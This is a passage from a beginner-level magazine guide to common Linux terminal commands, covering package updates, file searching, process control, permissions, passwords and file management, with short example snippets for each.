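  df -h          # disk usage of every mounted volume in human-readable units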
apt-get update && upgrade
Probably the single most important command to know and fear. We all know that to keep a computer system secure you need to keep it updated, but if you've got control of a Linux box the chances are that it isn't doing that automatically. A simple sudo apt-get update will order your system to check for the latest versions of any applications it's running, and sudo apt-get upgrade will download and install them. For the most part these are safe commands to use and should be run regularly - but occasionally updating one piece of software can break another, so back-up first...
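In practice the two are usually chained together, something along these lines:

  sudo apt-get update && sudo apt-get upgrade   # refresh the package lists, then install updates
  sudo apt-get dist-upgrade                     # also handles changed dependencies - use with more care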
cat
A command you'll often see if you're following instructions you've found online - and aren't always sure what you're doing - cat is short for concatenate and is used to combine files together. In its simplest form it can be used to take file1.txt and file2.txt and turn them into file3.txt, but it can also be combined with other commands to create a new file based on searching for patterns or words in the original.
Quite often you'll see cat used simply to explore a single file - if you don't specify an output filename, cat just writes what it finds to the screen. So online walkthroughs often use cat as a way of searching for text within a file and displaying the results in the terminal. This is because cat is non-destructive - it's very hard to accidentally use cat to change the original file where other commands might do.
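A couple of common patterns (the filenames are placeholders):

  cat file1.txt file2.txt > file3.txt   # concatenate two files into a third
  cat /var/log/syslog | less            # read a file on screen, one page at a time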
find
A useful and under-used command, the find command is pretty self-explanatory. It can be used to find stuff. Typing it by itself is much like ls, except that it lists all of the files within sub-directories of your current location as well as those in your current directory. You can use it to search for filenames using the format find -name "filename.txt". By inserting a path before the -name option, you can point it at specific starting folders to speed things up. By changing the -name option you can search by days since last accessed (-atime) or more.

> Nano isn't the only terminal text editor, but it's the easiest to use.
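For instance, something like the following (the paths and patterns are placeholders):

  find -name "filename.txt"       # search below the current directory
  find /var/www -name "*.php"     # start the search from a specific folder
  find /var/log -atime -7         # files accessed within the last seven days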
grep
As computer commands go there are few more fantastically named for the newcomer than the grep [it's a real verb! - Ed] command. How on earth are you ever going to master this Linux stuff if it just makes words up? But grep is a great utility for looking for patterns within files. Want to find every line that talks about Cheddar in a book about cheeses? grep "cheddar" bookofcheese.txt will do it for you. Even better, you can use it to search within multiple files using wildcards. So grep "cheddar" *.txt will find every text file in which cheddar is referenced. So now you grok grep, right?
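Sticking with the cheese theme, plus a recursive search through a config directory (assuming an Apache install):

  grep "cheddar" bookofcheese.txt      # lines mentioning cheddar in a single file
  grep -i "cheddar" *.txt              # the same across every text file, ignoring case
  grep -r "ServerName" /etc/apache2    # search a whole directory tree recursively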
top
When you're working in a graphical user interface such as a Linux desktop environment or Windows desktop, there's always an application like System Monitor or Task Manager which will call up a list of running applications and give you details about how many CPU cycles, memory or storage they're using. It's a vital troubleshooting tool if you have a program that's misbehaving and you don't know what it is. In a similar way, you can bring up a table of running applications in the Linux Terminal that does the same thing by typing top.
Like a lot of command line utilities, it's not immediately obvious how you can close top once you're finished with it without closing the terminal window itself - the almost universal command to get back to a prompt is Ctrl+c.

kill, killall
Using top you can figure out which application is using all your CPU cycles, but how do you stop it without a right-click > End Process menu? You use the command kill followed by the process ID (the PID number that top lists for each process). If you want to be sure of killing every process with a name that contains that application name, you use killall instead. So killall firefox will close down a web browser on a Linux desktop.
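Putting the two together, a typical sequence looks something like this - the PID 1234 is just an example:

  top               # find the misbehaving process, note its PID, then press q to quit
  kill 1234         # ask that process to shut down cleanly
  kill -9 1234      # force it to die if it ignores the polite request
  killall firefox   # or kill every process matching a name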

Path to
When you open a Terminal window within Linux, it can be a bit disorientating. But the words that sit in front of the flashing cursor will tell you where you are.
The first word is the name of the user you're logged in on, and it's followed by an @ sign. The second word is the hostname of the machine you're logged into. If you open up a Terminal on your desktop, usually the username and hostname are the same, so you'll see 'myname@myname'. When you log into a remote server, though, they'll be very different.
This information is followed by a colon, which is followed by the path to the directory you're in, followed by a dollar sign. When you first open a Terminal, it will usually print yourname@yourname:~$. The tilde indicates you're in the home folder for your username. If the dollar sign is replaced with a '#', you're using the machine as a root user. See cd for moving around and watch how the path changes as you do.
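As a made-up illustration of how the prompt changes as you move around and elevate yourself (the user and hostname are invented):

  alice@webserver:~$ cd /var/www
  alice@webserver:/var/www$ sudo su
  root@webserver:/var/www#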


20. chmod
User permissions are one of the most important parts of Linux security to understand. Every file has a set of permissions which defines who can see a file; who can read and write to a file; and who can execute a file as a program.
A file which can be seen by web visitors, but can only be changed by a specific user, is just about as basic as it gets when it comes to locking down a server. The problem is that some files need to be changeable and some don't - think of a Wordpress installation for a blog. You want Wordpress to be able to write some files so it can update them, but there's also a lot of files you don't want it to be able to change - and you really don't want to give it power to execute code unless you have to. The flipside is that problems with web servers can be traced back to incorrect file permissions, when an app needs to be able to modify a file but has been locked out by default.
Your friend in this area is chmod. It changes permissions for which users and groups can read, write or execute files. It's usually followed by three digits to indicate what the owner, members of its group and everyone else can do. Each digit runs from 0-7, where 7 allows for read, write and execute and 1 is execute only. If your user 'owns' the file in question, the syntax is simple; chmod 777 filename, for example, will give all users the ability to read and write to a file. It's good practice not to leave files in this state on a webserver - for obvious reasons. If you don't own the file, you'll need to add sudo to the front of that command.
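Some typical permission settings (the filenames are placeholders):

  chmod 644 page.html         # owner read/write, everyone else read-only - common for web files
  chmod 755 script.sh         # owner read/write/execute, everyone else read and execute
  sudo chmod 640 config.php   # owner read/write, group read, others nothing - for sensitive files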

w
From the weirdness of grep to the elegance of the w command: a whole command in a single letter. If you think another user is logged into your system, this is an important command to know. You can use w to list all currently active users, although don't rely on it too much as it's not hard for a hacker to be hidden.

> Keep an eye on the directory path in front of the command line to figure out where you are.

passwd
You must use passwd with extreme care. Ultra extreme care. Because the next word you write after it will become your login password, so if you type it incorrectly or forget it, you're going to find yourself in serious trouble.
You can only change your own user's password by default, but if you grant yourself sudo powers you can change any user's credentials by including their username after the passwd command itself. Typing sudo passwd, meanwhile, will change the password for root.
Check out the manual (man passwd) page for some useful options to expire passwords after a certain period of time and so on.
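The main variations look like this (someuser is a placeholder):

  passwd                 # change your own password
  sudo passwd someuser   # change another user's password
  sudo passwd            # change the password for root itself
  man passwd             # see the options for password expiry and so on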
cd
If you have a graphical interface and file browser, it's pretty easy to move to new locations on your hard drive just by clicking on them. In the Terminal, we know where we are because of the path (see the Path To box, left), and switch location using cd, which stands for 'change directory'. The cd command is mainly used in three ways:
- cd foldername This will move you to that folder, provided it exists within the folder you're currently browsing (use ls if you're not sure).
- cd ~/path/to/folder This will take you to a specific location within your home folder (the ~ character tells cd to start looking in your home folder). Starting with a / will tell cd to start the path at the root folder of your hard drive.
- cd .. This final useful command simply takes you up one level in the folder structure.

> One command that's invaluable is man, which is short for 'manual'. This will open up the help file for any other command. So if you want to know all the options for the ls command, simply type man ls and see what comes up.
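For example, the three forms side by side (the folder names are placeholders):

  cd websites          # move into a folder inside your current location
  cd ~/websites/logs   # jump straight to a path inside your home folder
  cd ..                # go back up one level
  man ls               # and man works for any command - here, the ls manual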
mv & rm & cp
When you get the hang of it, using a terminal as a file manager becomes pretty simple and quite a joyful experience. As well as cd, the three fundamental commands you'll need to remember are mv, rm and cp. The mv command is used to move a file from one location to another, rm is used to remove or delete a file and cp will copy files and folders.
Just as with cd, you can either enter a filename to operate on a file in the directory you're working in, or a full path - starting from the root of the drive with / or from your home folder with ~. For mv the syntax is mv ~/location1/file1.file ~/location2/location.
The big thing to remember is that in the Terminal there's no undo or undelete function: if you rm a file, it's gone forever (or at least will require very specialist skills to retrieve) and, in a similar fashion, if you mv or cp a file you'd better make a note of where it went.
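A quick sketch - and remember, there's no undo, so check your paths before pressing Enter:

  mv ~/location1/file1.file ~/location2/   # move (or rename) a file
  cp -r ~/website ~/website-backup         # copy a whole folder recursively
  rm oldfile.txt                           # delete a single file, permanently
  rm -r oldfolder                          # delete a folder and everything in it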
nano
It might seem odd, if you've spent your life in graphical applications and utilities, but complex programs run in the text terminal, too. There are several text editors which normally come as part of the whole package, notably nano and vi. You can open a blank document by typing nano, or you can edit an existing one by typing nano ~/path/to/text.txt (and do the same with vi). Some of the terminology may seem odd, though: to write out (Ctrl+o) means save, for example, and so on.

history
And finally, if you've been copying and pasting commands from the web all day, you might want to check up on what you've actually done. You can use history to give you a list of all the terminal commands entered going back a long, long way. Execute specific numbered commands with !<num>, go back through recent commands just by using the up and down arrows (and re-issue them by tapping Enter), or search for commands by pressing Ctrl+r.
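For instance (the command number is only an example):

  history             # list previous commands, each with a number
  history | grep ssh  # search your history for earlier ssh commands
  !685                # re-run command number 685 from that list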
